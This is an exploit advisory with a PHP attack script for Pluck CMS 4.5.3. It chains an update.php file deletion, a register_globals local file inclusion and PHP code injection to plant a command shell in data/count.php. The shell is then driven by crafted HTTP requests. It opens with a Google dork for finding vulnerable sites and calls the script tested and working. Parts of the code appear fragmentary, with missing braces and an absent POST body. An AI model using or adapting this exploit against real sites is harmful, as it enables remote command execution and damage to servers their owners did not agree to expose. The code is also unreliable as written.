Pluck 4.5.3 update.php remote file corruption exploit
         by Nine:Situations:Group::bookoo
         our site: http://retrogod.altervista.org/
         Google dorks: "powered by pluck" +admin 
         Exploit condition : register_globals = on
         Note(!): regardless of php.ini settings, this code will turn your host in a blank page ...

         this program carries a dangerous update.php script. If reachable
         in the main folder, you can delete the files with language and theme preferences:

         $step = $_GET['step'];

         elseif($step == "3") {

         echo "Rearranging files for compatibility with pluck 4.5...<br>";

         copy("data/title.dat", "data/settings/title.dat");

         copy("data/install.dat", "data/settings/install.dat");

         copy("data/options.php", "data/settings/options.php");

         copy("data/pass.php", "data/settings/pass.php");

         copy("data/inc/lang/langpref.php", "data/settings/langpref.php");

         copy("data/inc/themes/themepref.php", "data/settings/themepref.php");

         see the unlink() calls... the subsequent copy() has no results if you
         don't place the source files there...

         Now look at index.php, lines 21-26:
         //Include security-enhancements
         include ("data/inc/security.php");
         //Include Translation data
         include ("data/settings/langpref.php");
         include ("data/inc/lang/en.php");
         include ("data/inc/lang/$langpref");

         The script now fails to include the langpref.php script and "langpref" variable is not initialized then,
         ***if register_globals=on*** you can include arbitraty files from local resources.
         This check in security.php doesn't work as expected :
         //Register Globals
         //If Register Globals are ON, unset injected variables
         if(isset($_REQUEST)) {
	   foreach ($_REQUEST as $key => $value) { 
		if(isset($GLOBALS[$key])) {
         ex: http://host/path/index.php?GLOBALS[langpref]=1

         It unsets the "GLOBALS" key from the GLOBALS[] array, while langpref variable remains

         You can include the /data/inc/page_editmeta.php script which contains a nice php injection:

         if(isset($_POST['Submit'])) {
         $data = "data/content/$editmeta";
         $file = fopen($data, "w");  
         fputs($file, "<?php 
         \$title = \"$title\";
         \$content = \"$content\";
         \$contactinc = \"$contactinc\";
         \$hidden = \"$hidden\";
         \$description = \"$cont1\";
         \$keywords = \"$sleutel\";
         \$copyright = \"$copyr\";");
         //Check if we also need to include albums
         if ($incalbum) {
         foreach ($incalbum as $name => $value) {
         fputs($file, "\n\$incalbum['$name'] = \"yes\";");
         } }
         //Check if we also need to include blogs
         if ($incblog) {
         foreach ($incblog as $name => $value) {
         fputs($file, "\n\$incblog['$name'] = \"yes\";");
         } }
         fputs($file, "\n ?>");

         also this check in /data/inc/page_editmeta.php is unuseful because
         you call it from the main script:
         //Make sure the file isn't accessed directly
         if((!ereg("index.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("admin.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("install.php", $_SERVER['SCRIPT_FILENAME'])) && (!ereg("login.php", $_SERVER['SCRIPT_FILENAME']))){
         //Give out an "access denied" error
         echo "access denied";
         //Block all other code

         We choose the /data/count.php to inject a php shell then you can launch commands on the target server.

        $cmd = "uname";//change here
        $argv[3] ? $port = (int) $argv[3] : $port = 80;
        $argv[2] ? print("attackin'...\n") : die ("syntax: php ".$argv[0]." [host] [path] [[port]]");

        $win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
        $win ? dl("php_curl.dll") : dl("php_curl.so");

        $url = "http://$host:$port";
        function send($url,$header)
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL,$url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 0);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

            $data = curl_exec($ch); if (curl_errno($ch)) {
            print curl_error($ch)."\n";
            } else {
            return $data."\n";

        $agent = "Mozilla</b>/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)";

        $header ="GET ".$path."update.php?step=3 HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\nConnection: Close\r\n\r\n";

        //oh, how evil... tested and working against PHP 5.2.4
        $header ="POST ".$path."index.php HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
        $header.="Content-Type: application/x-www-form-urlencoded\r\n";
        $header.="Content-Length: 218\r\n";
        $header.="Connection: Close\r\n\r\n";

        $header ="GET ".$path."data/count.php HTTP/1.0\r\n";
        $header.="Host: $host\r\nUser-Agent: $agent\r\n";
        $header.="CMD: $cmd\r\n";
        $header.="Connection: Close\r\n\r\n";
        count($out)==2 ? print("exploit succeeded...\n$out[1]") : print("exploit failed... :(\n");